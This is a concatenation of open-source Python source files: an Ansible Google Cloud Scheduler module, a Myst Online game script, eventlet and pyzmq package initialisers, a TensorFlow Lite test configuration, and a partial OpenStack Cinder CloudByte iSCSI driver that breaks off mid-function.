from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
################################################################################
# Main
################################################################################
def main():
"""Main function"""
module = GcpModule(
argument_spec=dict(
state=dict(default='present', choices=['present', 'absent'], type='str'),
name=dict(required=True, type='str'),
description=dict(type='str'),
schedule=dict(type='str'),
time_zone=dict(default='Etc/UTC', type='str'),
retry_config=dict(
type='dict',
options=dict(
retry_count=dict(type='int'),
max_retry_duration=dict(type='str'),
min_backoff_duration=dict(type='str'),
max_backoff_duration=dict(type='str'),
max_doublings=dict(type='int'),
),
),
pubsub_target=dict(type='dict', options=dict(topic_name=dict(required=True, type='str'), data=dict(type='str'), attributes=dict(type='dict'))),
app_engine_http_target=dict(
type='dict',
options=dict(
http_method=dict(type='str'),
app_engine_routing=dict(type='dict', options=dict(service=dict(type='str'), version=dict(type='str'), instance=dict(type='str'))),
relative_uri=dict(required=True, type='str'),
body=dict(type='str'),
headers=dict(type='dict'),
),
),
http_target=dict(
type='dict',
options=dict(
uri=dict(required=True, type='str'),
http_method=dict(type='str'),
body=dict(type='str'),
headers=dict(type='dict'),
oauth_token=dict(type='dict', options=dict(service_account_email=dict(type='str'), scope=dict(type='str'))),
oidc_token=dict(type='dict', options=dict(service_account_email=dict(type='str'), audience=dict(type='str'))),
),
),
region=dict(required=True, type='str'),
),
mutually_exclusive=[['app_engine_http_target', 'http_target', 'pubsub_target']],
)
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/cloud-platform']
state = module.params['state']
fetch = fetch_resource(module, self_link(module))
changed = False
if fetch:
if state == 'present':
if is_different(module, fetch):
update(module, self_link(module))
fetch = fetch_resource(module, self_link(module))
changed = True
else:
delete(module, self_link(module))
fetch = {}
changed = True
else:
if state == 'present':
fetch = create(module, collection(module))
changed = True
else:
fetch = {}
fetch.update({'changed': changed})
module.exit_json(**fetch)
def create(module, link):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.post(link, resource_to_request(module)))
def update(module, link):
delete(module, self_link(module))
create(module, collection(module))
def delete(module, link):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.delete(link))
def resource_to_request(module):
request = {
u'name': module.params.get('name'),
u'description': module.params.get('description'),
u'schedule': module.params.get('schedule'),
u'timeZone': module.params.get('time_zone'),
u'retryConfig': JobRetryconfig(module.params.get('retry_config', {}), module).to_request(),
u'pubsubTarget': JobPubsubtarget(module.params.get('pubsub_target', {}), module).to_request(),
u'appEngineHttpTarget': JobAppenginehttptarget(module.params.get('app_engine_http_target', {}), module).to_request(),
u'httpTarget': JobHttptarget(module.params.get('http_target', {}), module).to_request(),
}
request = encode_request(request, module)
return_vals = {}
for k, v in request.items():
if v or v is False:
return_vals[k] = v
return return_vals
def fetch_resource(module, link, allow_not_found=True):
auth = GcpSession(module, 'cloudscheduler')
return return_if_object(module, auth.get(link), allow_not_found)
def self_link(module):
return "https://cloudscheduler.googleapis.com/v1/projects/{project}/locations/{region}/jobs/{name}".format(**module.params)
def collection(module):
return "https://cloudscheduler.googleapis.com/v1/projects/{project}/locations/{region}/jobs".format(**module.params)
def return_if_object(module, response, allow_not_found=False):
# If not found, return nothing.
if allow_not_found and response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError):
module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
result = decode_request(result, module)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
def is_different(module, response):
request = resource_to_request(module)
response = response_to_hash(module, response)
request = decode_request(request, module)
# Remove all output-only from response.
response_vals = {}
for k, v in response.items():
if k in request:
response_vals[k] = v
request_vals = {}
for k, v in request.items():
if k in response:
request_vals[k] = v
return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
return {
u'name': module.params.get('name'),
u'description': module.params.get('description'),
u'schedule': module.params.get('schedule'),
u'timeZone': module.params.get('time_zone'),
u'retryConfig': JobRetryconfig(module.params.get('retry_config', {}), module).to_request(),
u'pubsubTarget': JobPubsubtarget(module.params.get('pubsub_target', {}), module).to_request(),
u'appEngineHttpTarget': JobAppenginehttptarget(module.params.get('app_engine_http_target', {}), module).to_request(),
u'httpTarget': JobHttptarget(module.params.get('http_target', {}), module).to_request(),
}
def encode_request(request, module):
request['name'] = "projects/%s/locations/%s/jobs/%s" % (module.params['project'], module.params['region'], module.params['name'])
return request
def decode_request(response, module):
if 'name' in response:
response['name'] = response['name'].split('/')[-1]
return response
class JobRetryconfig(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'retryCount': self.request.get('retry_count'),
u'maxRetryDuration': self.request.get('max_retry_duration'),
u'minBackoffDuration': self.request.get('min_backoff_duration'),
u'maxBackoffDuration': self.request.get('max_backoff_duration'),
u'maxDoublings': self.request.get('max_doublings'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'retryCount': self.module.params.get('retry_count'),
u'maxRetryDuration': self.module.params.get('max_retry_duration'),
u'minBackoffDuration': self.module.params.get('min_backoff_duration'),
u'maxBackoffDuration': self.module.params.get('max_backoff_duration'),
u'maxDoublings': self.module.params.get('max_doublings'),
}
)
class JobPubsubtarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'topicName': self.request.get('topic_name'), u'data': self.request.get('data'), u'attributes': self.request.get('attributes')}
)
def from_response(self):
return remove_nones_from_dict(
{u'topicName': self.module.params.get('topic_name'), u'data': self.module.params.get('data'), u'attributes': self.module.params.get('attributes')}
)
class JobAppenginehttptarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'httpMethod': self.request.get('http_method'),
u'appEngineRouting': JobAppenginerouting(self.request.get('app_engine_routing', {}), self.module).to_request(),
u'relativeUri': self.request.get('relative_uri'),
u'body': self.request.get('body'),
u'headers': self.request.get('headers'),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'httpMethod': self.module.params.get('http_method'),
u'appEngineRouting': JobAppenginerouting(self.module.params.get('app_engine_routing', {}), self.module).to_request(),
u'relativeUri': self.request.get(u'relativeUri'),
u'body': self.module.params.get('body'),
u'headers': self.module.params.get('headers'),
}
)
class JobAppenginerouting(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{u'service': self.request.get('service'), u'version': self.request.get('version'), u'instance': self.request.get('instance')}
)
def from_response(self):
return remove_nones_from_dict(
{u'service': self.module.params.get('service'), u'version': self.module.params.get('version'), u'instance': self.module.params.get('instance')}
)
class JobHttptarget(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict(
{
u'uri': self.request.get('uri'),
u'httpMethod': self.request.get('http_method'),
u'body': self.request.get('body'),
u'headers': self.request.get('headers'),
u'oauthToken': JobOauthtoken(self.request.get('oauth_token', {}), self.module).to_request(),
u'oidcToken': JobOidctoken(self.request.get('oidc_token', {}), self.module).to_request(),
}
)
def from_response(self):
return remove_nones_from_dict(
{
u'uri': self.request.get(u'uri'),
u'httpMethod': self.request.get(u'httpMethod'),
u'body': self.request.get(u'body'),
u'headers': self.request.get(u'headers'),
u'oauthToken': JobOauthtoken(self.module.params.get('oauth_token', {}), self.module).to_request(),
u'oidcToken': JobOidctoken(self.module.params.get('oidc_token', {}), self.module).to_request(),
}
)
class JobOauthtoken(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get('service_account_email'), u'scope': self.request.get('scope')})
def from_response(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get(u'serviceAccountEmail'), u'scope': self.request.get(u'scope')})
class JobOidctoken(object):
def __init__(self, request, module):
self.module = module
if request:
self.request = request
else:
self.request = {}
def to_request(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get('service_account_email'), u'audience': self.request.get('audience')})
def from_response(self):
return remove_nones_from_dict({u'serviceAccountEmail': self.request.get(u'serviceAccountEmail'), u'audience': self.request.get(u'audience')})
if __name__ == '__main__':
main()
| resmo/ansible | lib/ansible/modules/cloud/google/gcp_cloudscheduler_job.py | Python | gpl-3.0 | 31,832 |
# -*- coding: utf-8 -*-
""" *==LICENSE==*
CyanWorlds.com Engine - MMOG client, server and tools
Copyright (C) 2011 Cyan Worlds, Inc.
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
Additional permissions under GNU GPL version 3 section 7
If you modify this Program, or any covered work, by linking or
combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK,
NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent
JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK
(or a modified version of those libraries),
containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA,
PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG
JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the
licensors of this Program grant you additional
permission to convey the resulting work. Corresponding Source for a
non-source form of such a combination shall include the source code for
the parts of OpenSSL and IJG JPEG Library used as well as that of the covered
work.
You can contact Cyan Worlds, Inc. by email [email protected]
or by snail mail at:
Cyan Worlds, Inc.
14617 N Newport Hwy
Mead, WA 99021
*==LICENSE==* """
"""
Module: ahnyTrees
Age: Ahnonay
Date: April, 2007
Author: Derek Odell
Ahnonay Quab control
"""
from Plasma import *
from PlasmaTypes import *
# define the attributes that will be entered in max
rgnTrees = ptAttribActivator(1, "act: Tree Detector")
respTreeAnims = ptAttribResponderList(2, "resp: Tree Anims", byObject=1)
objTrees = ptAttribSceneobjectList(3, "obj: Tree Meshs")
SDLTrees = ptAttribString(4, "str: SDL Trees (optional)")
# globals
respTreeAnimsList = []
objTreeList = []
#====================================
class ahnyTrees(ptModifier):
###########################
def __init__(self):
ptModifier.__init__(self)
self.id = 5948
version = 1
self.version = version
print "__init__ahnyTrees v%d " % (version)
###########################
def OnFirstUpdate(self):
global respTreeAnimsList
global objTreeList
try:
ageSDL = PtGetAgeSDL()
ageSDL[SDLTrees.value][0]
except:
print "ahnyTrees.OnServerInitComplete(): ERROR --- Cannot find the Ahnonay Age SDL"
ageSDL[SDLTrees.value] = (1,1,1,1,1,1,1,1,1,1,1,1,1,1,1)
ageSDL.setFlags(SDLTrees.value,1,1)
ageSDL.sendToClients(SDLTrees.value)
ageSDL.setNotify(self.key,SDLTrees.value,0.0)
for responder in respTreeAnims.value:
thisResp = responder.getName()
respTreeAnimsList.append(thisResp)
for object in objTrees.value:
thisObj = object.getName()
objTreeList.append(thisObj)
ageSDL = PtGetAgeSDL()
idx = 0
for visible in ageSDL[SDLTrees.value]:
if not visible:
respTreeAnims.run(self.key, objectName=respTreeAnimsList[idx], fastforward=1)
idx += 1
###########################
def OnNotify(self,state,id,events):
global respTreeAnimsList
global objTreeList
print "ahnyTrees.OnNotify: state=%s id=%d events=" % (state, id), events
if id == rgnTrees.id:
for event in events:
if event[0] == kCollisionEvent and self.sceneobject.isLocallyOwned() :
region = event[3]
regName = region.getName()
for object in objTreeList:
if object == regName:
ageSDL = PtGetAgeSDL()
treeSDL = list(ageSDL[SDLTrees.value])
index = objTreeList.index(object)
if treeSDL[index]:
respTreeAnims.run(self.key, objectName=respTreeAnimsList[index], netForce = 1)
treeSDL[index] = 0
ageSDL[SDLTrees.value] = tuple(treeSDL)
print "ahnyTrees.OnNotify: Tree knocked down"
| TOC-Shard/moul-scripts | Python/ahnyTrees.py | Python | gpl-3.0 | 4,774 |
from eventlet import patcher
from eventlet.green import socket
from eventlet.green import time
from eventlet.green import httplib
from eventlet.green import ftplib
from eventlet.support import six
if six.PY2:
to_patch = [('socket', socket), ('httplib', httplib),
('time', time), ('ftplib', ftplib)]
try:
from eventlet.green import ssl
to_patch.append(('ssl', ssl))
except ImportError:
pass
patcher.inject('urllib', globals(), *to_patch)
try:
URLopener
except NameError:
patcher.inject('urllib.request', globals(), *to_patch)
# patch a bunch of things that have imports inside the
# function body; this is lame and hacky but I don't feel
# too bad because urllib is a hacky pile of junk that no
# one should be using anyhow
URLopener.open_http = patcher.patch_function(URLopener.open_http, ('httplib', httplib))
if hasattr(URLopener, 'open_https'):
URLopener.open_https = patcher.patch_function(URLopener.open_https, ('httplib', httplib))
URLopener.open_ftp = patcher.patch_function(URLopener.open_ftp, ('ftplib', ftplib))
ftpwrapper.init = patcher.patch_function(ftpwrapper.init, ('ftplib', ftplib))
ftpwrapper.retrfile = patcher.patch_function(ftpwrapper.retrfile, ('ftplib', ftplib))
del patcher
# Run test program when run as a script
if __name__ == '__main__':
main()
| pbaesse/Sissens | lib/python2.7/site-packages/eventlet/green/urllib/__init__.py | Python | gpl-3.0 | 1,423 |
"""pure-Python sugar wrappers for core 0MQ objects."""
#-----------------------------------------------------------------------------
# Copyright (C) 2013 Brian Granger, Min Ragan-Kelley
#
# This file is part of pyzmq
#
# Distributed under the terms of the New BSD License. The full license is in
# the file COPYING.BSD, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
from zmq.sugar import (
constants, context, frame, poll, socket, tracker, version
)
from zmq import error
__all__ = ['constants']
for submod in (
constants, context, error, frame, poll, socket, tracker, version
):
__all__.extend(submod.__all__)
from zmq.error import *
from zmq.sugar.context import *
from zmq.sugar.tracker import *
from zmq.sugar.socket import *
from zmq.sugar.constants import *
from zmq.sugar.frame import *
from zmq.sugar.poll import *
# from zmq.sugar.stopwatch import *
# from zmq.sugar._device import *
from zmq.sugar.version import *
| IsCoolEntertainment/debpkg_python-pyzmq | zmq/sugar/__init__.py | Python | lgpl-3.0 | 1,187 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test configs for batch_to_space_nd."""
import numpy as np
import tensorflow.compat.v1 as tf
from tensorflow.lite.testing.zip_test_utils import create_tensor_data
from tensorflow.lite.testing.zip_test_utils import make_zip_of_tests
from tensorflow.lite.testing.zip_test_utils import register_make_test_function
@register_make_test_function()
def make_batch_to_space_nd_tests(options):
"""Make a set of tests to do batch_to_space_nd."""
test_parameters = [
{
"dtype": [tf.float32, tf.int64, tf.int32],
"input_shape": [[12, 3, 3, 1]],
"block_shape": [[1, 4], [2, 2], [3, 4]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
"dynamic_range_quantize": [False],
},
# Single batch (no-op)
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3, 1]],
"block_shape": [[1, 1]],
"crops": [[[0, 0], [0, 0]], [[1, 1], [1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
"dynamic_range_quantize": [True, False],
},
# 3D use case.
{
"dtype": [tf.float32],
"input_shape": [[1, 3, 3]],
"block_shape": [[1]],
"crops": [[[0, 0]], [[1, 1]]],
"constant_block_shape": [True],
"constant_crops": [True],
"dynamic_range_quantize": [True, False],
},
]
if options.run_with_flex:
# Non-4D use case: 1 batch dimension, 3 spatial dimensions, 2 others.
test_parameters = test_parameters + [{
"dtype": [tf.float32],
"input_shape": [[8, 2, 2, 2, 1, 1]],
"block_shape": [[2, 2, 2]],
"crops": [[[0, 0], [0, 0], [0, 0]]],
"constant_block_shape": [True, False],
"constant_crops": [True, False],
"dynamic_range_quantize": [False],
}]
def build_graph(parameters):
"""Build a batch_to_space graph given `parameters`."""
input_tensor = tf.compat.v1.placeholder(
dtype=parameters["dtype"],
name="input",
shape=parameters["input_shape"])
input_tensors = [input_tensor]
# Get block_shape either as a const or as a placeholder (tensor).
if parameters["constant_block_shape"]:
block_shape = parameters["block_shape"]
else:
shape = [len(parameters["block_shape"])]
block_shape = tf.compat.v1.placeholder(
dtype=tf.int32, name="shape", shape=shape)
input_tensors.append(block_shape)
# Get crops either as a const or as a placeholder (tensor).
if parameters["constant_crops"]:
crops = parameters["crops"]
else:
shape = [len(parameters["crops"]), 2]
crops = tf.compat.v1.placeholder(
dtype=tf.int32, name="crops", shape=shape)
input_tensors.append(crops)
out = tf.batch_to_space_nd(input_tensor, block_shape, crops)
return input_tensors, [out]
def build_inputs(parameters, sess, inputs, outputs):
values = [
create_tensor_data(parameters["dtype"], parameters["input_shape"])
]
if not parameters["constant_block_shape"]:
values.append(np.array(parameters["block_shape"]))
if not parameters["constant_crops"]:
values.append(np.array(parameters["crops"]))
return values, sess.run(outputs, feed_dict=dict(zip(inputs, values)))
make_zip_of_tests(options, test_parameters, build_graph, build_inputs)
| tensorflow/tensorflow | tensorflow/lite/testing/op_tests/batch_to_space_nd.py | Python | apache-2.0 | 4,144 |
# Copyright 2015 CloudByte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import units
import six
from six.moves import http_client
from six.moves import urllib
from cinder import exception
from cinder.i18n import _, _LE, _LI
from cinder.volume.drivers.cloudbyte import options
from cinder.volume.drivers.san import san
LOG = logging.getLogger(__name__)
class CloudByteISCSIDriver(san.SanISCSIDriver):
"""CloudByte ISCSI Driver.
Version history:
1.0.0 - Initial driver
1.1.0 - Add chap support and minor bug fixes
1.1.1 - Add wait logic for delete volumes
"""
VERSION = '1.1.1'
volume_stats = {}
def __init__(self, *args, **kwargs):
super(CloudByteISCSIDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(
options.cloudbyte_add_qosgroup_opts)
self.configuration.append_config_values(
options.cloudbyte_create_volume_opts)
self.configuration.append_config_values(
options.cloudbyte_connection_opts)
self.cb_use_chap = self.configuration.use_chap_auth
self.get_volume_stats()
def _get_url(self, cmd, params, apikey):
"""Will prepare URL that connects to CloudByte."""
if params is None:
params = {}
params['command'] = cmd
params['response'] = 'json'
sanitized_params = {}
for key in params:
value = params[key]
if value is not None:
sanitized_params[key] = six.text_type(value)
sanitized_params = urllib.parse.urlencode(sanitized_params)
url = ('/client/api?%s' % sanitized_params)
LOG.debug("CloudByte URL to be executed: [%s].", url)
# Add the apikey
api = {}
api['apiKey'] = apikey
url = url + '&' + urllib.parse.urlencode(api)
return url
def _extract_http_error(self, error_data):
# Extract the error message from error_data
error_msg = ""
# error_data is a single key value dict
for key, value in error_data.items():
error_msg = value.get('errortext')
return error_msg
def _execute_and_get_response_details(self, host, url):
"""Will prepare response after executing an http request."""
res_details = {}
try:
# Prepare the connection
connection = http_client.HTTPSConnection(host)
# Make the connection
connection.request('GET', url)
# Extract the response as the connection was successful
response = connection.getresponse()
# Read the response
data = response.read()
# Transform the json string into a py object
data = json.loads(data)
# Extract http error msg if any
error_details = None
if response.status != 200:
error_details = self._extract_http_error(data)
# Prepare the return object
res_details['data'] = data
res_details['error'] = error_details
res_details['http_status'] = response.status
finally:
connection.close()
LOG.debug("CloudByte connection was closed successfully.")
return res_details
def _api_request_for_cloudbyte(self, cmd, params, version=None):
"""Make http calls to CloudByte."""
LOG.debug("Executing CloudByte API for command [%s].", cmd)
if version is None:
version = CloudByteISCSIDriver.VERSION
# Below is retrieved from /etc/cinder/cinder.conf
apikey = self.configuration.cb_apikey
if apikey is None:
msg = (_("API key is missing for CloudByte driver."))
raise exception.VolumeBackendAPIException(data=msg)
host = self.configuration.san_ip
# Construct the CloudByte URL with query params
url = self._get_url(cmd, params, apikey)
data = {}
error_details = None
http_status = None
try:
# Execute CloudByte API & frame the response
res_obj = self._execute_and_get_response_details(host, url)
data = res_obj['data']
error_details = res_obj['error']
http_status = res_obj['http_status']
except http_client.HTTPException as ex:
msg = (_("Error executing CloudByte API [%(cmd)s], "
"Error: %(err)s.") %
{'cmd': cmd, 'err': ex})
raise exception.VolumeBackendAPIException(data=msg)
# Check if it was an error response from CloudByte
if http_status != 200:
msg = (_("Failed to execute CloudByte API [%(cmd)s]."
" Http status: %(status)s,"
" Error: %(error)s.") %
{'cmd': cmd, 'status': http_status,
'error': error_details})
raise exception.VolumeBackendAPIException(data=msg)
LOG.info(_LI("CloudByte API executed successfully for command [%s]."),
cmd)
return data
def _request_tsm_details(self, account_id):
params = {"accountid": account_id}
# List all CloudByte tsm
data = self._api_request_for_cloudbyte("listTsm", params)
return data
def _override_params(self, default_dict, filtered_user_dict):
"""Override the default config values with user provided values."""
if filtered_user_dict is None:
# Nothing to override
return default_dict
for key, value in default_dict.items():
# Fill the user dict with default options based on condition
if filtered_user_dict.get(key) is None and value is not None:
filtered_user_dict[key] = value
return filtered_user_dict
def _add_qos_group_request(self, volume, tsmid, volume_name):
# Get qos related params from configuration
params = self.configuration.cb_add_qosgroup
if params is None:
params = {}
params['name'] = "QoS_" + volume_name
params['tsmid'] = tsmid
data = self._api_request_for_cloudbyte("addQosGroup", params)
return data
def _create_volume_request(self, volume, datasetid, qosgroupid,
tsmid, volume_name):
size = volume.get('size')
quotasize = six.text_type(size) + "G"
# Prepare the user input params
params = {
"datasetid": datasetid,
"name": volume_name,
"qosgroupid": qosgroupid,
"tsmid": tsmid,
"quotasize": quotasize
}
# Get the additional params from configuration
params = self._override_params(self.configuration.cb_create_volume,
params)
data = self._api_request_for_cloudbyte("createVolume", params)
return data
def _queryAsyncJobResult_request(self, jobid):
async_cmd = "queryAsyncJobResult"
params = {
"jobId": jobid,
}
data = self._api_request_for_cloudbyte(async_cmd, params)
return data
def _get_tsm_details(self, data, tsm_name, account_name):
# Filter required tsm's details
tsms = data['listTsmResponse'].get('listTsm')
if tsms is None:
msg = (_("TSM [%(tsm)s] was not found in CloudByte storage "
"for account [%(account)s].") %
{'tsm': tsm_name, 'account': account_name})
raise exception.VolumeBackendAPIException(data=msg)
tsmdetails = {}
for tsm in tsms:
if tsm['name'] == tsm_name:
tsmdetails['datasetid'] = tsm['datasetid']
tsmdetails['tsmid'] = tsm['id']
break
return tsmdetails
def _retry_volume_operation(self, operation, retries,
max_retries, jobid,
cb_volume):
"""CloudByte async calls via the FixedIntervalLoopingCall."""
# Query the CloudByte storage with this jobid
volume_response = self._queryAsyncJobResult_request(jobid)
count = retries['count']
result_res = None
if volume_response is not None:
result_res = volume_response.get('queryasyncjobresultresponse')
if result_res is None:
msg = (_(
"Null response received while querying "
"for [%(operation)s] based job [%(job)s] "
"at CloudByte storage.") %
{'operation': operation, 'job': jobid})
raise exception.VolumeBackendAPIException(data=msg)
status = result_res.get('jobstatus')
if status == 1:
LOG.info(_LI("CloudByte operation [%(operation)s] succeeded for "
"volume [%(cb_volume)s]."),
{'operation': operation, 'cb_volume': cb_volume})
raise loopingcall.LoopingCallDone()
elif count == max_retries:
# All attempts exhausted
LOG.error(_LE("CloudByte operation [%(operation)s] failed"
" for volume [%(vol)s]. Exhausted all"
" [%(max)s] attempts."),
{'operation': operation,
'vol': cb_volume,
'max': max_retries})
raise loopingcall.LoopingCallDone(retvalue=False)
else:
count += 1
retries['count'] = count
LOG.debug("CloudByte operation [%(operation)s] for"
" volume [%(vol)s]: retry [%(retry)s] of [%(max)s].",
{'operation': operation,
'vol': cb_volume,
'retry': count,
'max': max_retries})
def _wait_for_volume_creation(self, volume_response, cb_volume_name):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('createvolumeresponse')
if vol_res is None:
msg = _("Null response received while creating volume [%s] "
"at CloudByte storage.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Job id not found in CloudByte's "
"create volume [%s] response.") % cb_volume_name
raise exception.VolumeBackendAPIException(data=msg)
retry_interval = (
self.configuration.cb_confirm_volume_create_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_create_retries)
retries = {'count': 0}
timer = loopingcall.FixedIntervalLoopingCall(
self._retry_volume_operation,
'Create Volume',
retries,
max_retries,
jobid,
cb_volume_name)
timer.start(interval=retry_interval).wait()
def _wait_for_volume_deletion(self, volume_response, cb_volume_id):
"""Given the job wait for it to complete."""
vol_res = volume_response.get('deleteFileSystemResponse')
if vol_res is None:
msg = _("Null response received while deleting volume [%s] "
"at CloudByte storage.") % cb_volume_id
raise exception.VolumeBackendAPIException(data=msg)
jobid = vol_res.get('jobid')
if jobid is None:
msg = _("Job id not found in CloudByte's "
"delete volume [%s] response.") % cb_volume_id
raise exception.VolumeBackendAPIException(data=msg)
retry_interval = (
self.configuration.cb_confirm_volume_delete_retry_interval)
max_retries = (
self.configuration.cb_confirm_volume_delete_retries)
retries = {'count': 0}
timer = loopingcall.FixedIntervalLoopingCall(
self._retry_volume_operation,
'Delete Volume',
retries,
max_retries,
jobid,
cb_volume_id)
timer.start(interval=retry_interval).wait()
def _get_volume_id_from_response(self, cb_volumes, volume_name):
"""Search the volume in CloudByte storage."""
vol_res = cb_volumes.get('listFilesystemResponse')
if vol_res is None:
msg = _("Null response received from CloudByte's "
"list filesystem.")
raise exception.VolumeBackendAPIException(data=msg)
volumes = vol_res.get('filesystem')
if volumes is None:
msg = _('No volumes found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
volume_id = None
for vol in volumes:
if vol['name'] == volume_name:
volume_id = vol['id']
break
if volume_id is None:
msg = _("Volume [%s] not found in CloudByte "
"storage.") % volume_name
raise exception.VolumeBackendAPIException(data=msg)
return volume_id
def _get_qosgroupid_id_from_response(self, cb_volumes, volume_id):
volumes = cb_volumes['listFilesystemResponse']['filesystem']
qosgroup_id = None
for vol in volumes:
if vol['id'] == volume_id:
qosgroup_id = vol['groupid']
break
return qosgroup_id
def _build_provider_details_from_volume(self, volume, chap):
model_update = {}
model_update['provider_location'] = (
'%s %s %s' % (volume['ipaddress'] + ':3260', volume['iqnname'], 0)
)
# Will provide CHAP Authentication on forthcoming patches/release
model_update['provider_auth'] = None
if chap:
model_update['provider_auth'] = ('CHAP %(username)s %(password)s'
% chap)
model_update['provider_id'] = volume['id']
LOG.debug("CloudByte volume iqn: [%(iqn)s] provider id: [%(proid)s].",
{'iqn': volume['iqnname'], 'proid': volume['id']})
return model_update
def _build_provider_details_from_response(self,
cb_volumes,
volume_name,
chap):
"""Get provider information."""
model_update = {}
volumes = cb_volumes['listFilesystemResponse']['filesystem']
for vol in volumes:
if vol['name'] == volume_name:
model_update = self._build_provider_details_from_volume(vol,
chap)
break
return model_update
def _get_initiator_group_id_from_response(self, data):
"""Find iSCSI initiator group id."""
ig_list_res = data.get('listInitiatorsResponse')
if ig_list_res is None:
msg = _("Null response received from CloudByte's "
"list iscsi initiators.")
raise exception.VolumeBackendAPIException(data=msg)
ig_list = ig_list_res.get('initiator')
if ig_list is None:
msg = _('No iscsi initiators were found in CloudByte.')
raise exception.VolumeBackendAPIException(data=msg)
ig_id = None
for ig in ig_list:
if ig.get('initiatorgroup') == 'ALL':
ig_id = ig['id']
break
return ig_id
def _get_iscsi_service_id_from_response(self, volume_id, data):
iscsi_service_res = data.get('listVolumeiSCSIServiceResponse')
if iscsi_service_res is None:
msg = _("Null response received from CloudByte's "
"list volume iscsi service.")
raise exception.VolumeBackendAPIException(data=msg)
iscsi_service_list = iscsi_service_res.get('iSCSIService')
if iscsi_service_list is None:
msg = _('No iscsi services found in CloudByte storage.')
raise exception.VolumeBackendAPIException(data=msg)
iscsi_id = None
for iscsi_service in iscsi_service_list:
if iscsi_service['volume_id'] == volume_id:
iscsi_id = iscsi_service['id']
break
if iscsi_id is None:
msg = _("No iscsi service found for CloudByte "
"volume [%s].") % volume_id
raise exception.VolumeBackendAPIException(data=msg)
else:
return iscsi_id
def _request_update_iscsi_service(self, iscsi_id, ig_id, ag_id):
params = {
"id": iscsi_id,
"igid": ig_id
}
if ag_id:
params['authgroupid'] = ag_id
params['authmethod'] = "CHAP"
self._api_request_for_cloudbyte(
'updateVolumeiSCSIService', params)
def _get_cb_snapshot_path(self, snapshot_name, volume_id):
"""Find CloudByte snapshot path."""
params = {"id": volume_id}
# List all snapshot from CloudByte
cb_snapshots_list = self._api_request_for_cloudbyte(
'listStorageSnapshots', params)
# Filter required snapshot from list
cb_snap_res = cb_snapshots_list.get('listDatasetSnapshotsResponse')
cb_snapshot = {}
if cb_snap_res is not None:
cb_snapshot = cb_snap_res.get('snapshot')
path = None
# Filter snapshot path
for snap in cb_snapshot:
if snap['name'] == snapshot_name:
path = snap['path']
break
return path
def _get_account_id_from_name(self, account_name):
params = {}
